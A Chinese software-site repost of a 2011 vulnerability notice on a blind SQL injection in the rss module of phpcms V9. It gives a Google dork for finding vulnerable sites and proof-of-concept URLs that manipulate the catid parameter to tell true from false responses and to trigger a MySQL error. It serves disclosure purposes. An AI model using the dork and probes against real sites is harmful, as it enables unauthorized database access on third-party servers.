文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>phpcms V9 BLind SQL 注入漏洞0day

phpcms V9 BLind SQL 注入漏洞0day

时间:2011-01-23  来源:eidelweiss

发布日期:2011-01.23
发布作者:eidelweiss


影响版本:phpcms v9 blind
官方网站:http://www.phpcms.cn

漏洞类型:SQL注入
漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。
 

 

google dork:inurl:"index.php?m=content+c=rss+catid=10"
 

exploit & p0c

 

[!] index.php?m=content&c=rss&catid=[valid catid]

 

 

Example p0c

 

[!] http://host/index.php?m=content&c=rss&catid=10 <= True

[!] http://host/index.php?m=content&c=rss&catid=-10 <= False

 

[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)
 

 

标签分类:

相关阅读 更多 +
排行榜 更多 +
谷歌卫星地图免费版下载

谷歌卫星地图免费版下载

生活实用 下载
谷歌卫星地图免费版下载

谷歌卫星地图免费版下载

生活实用 下载
kingsofpool官方正版下载

kingsofpool官方正版下载

赛车竞速 下载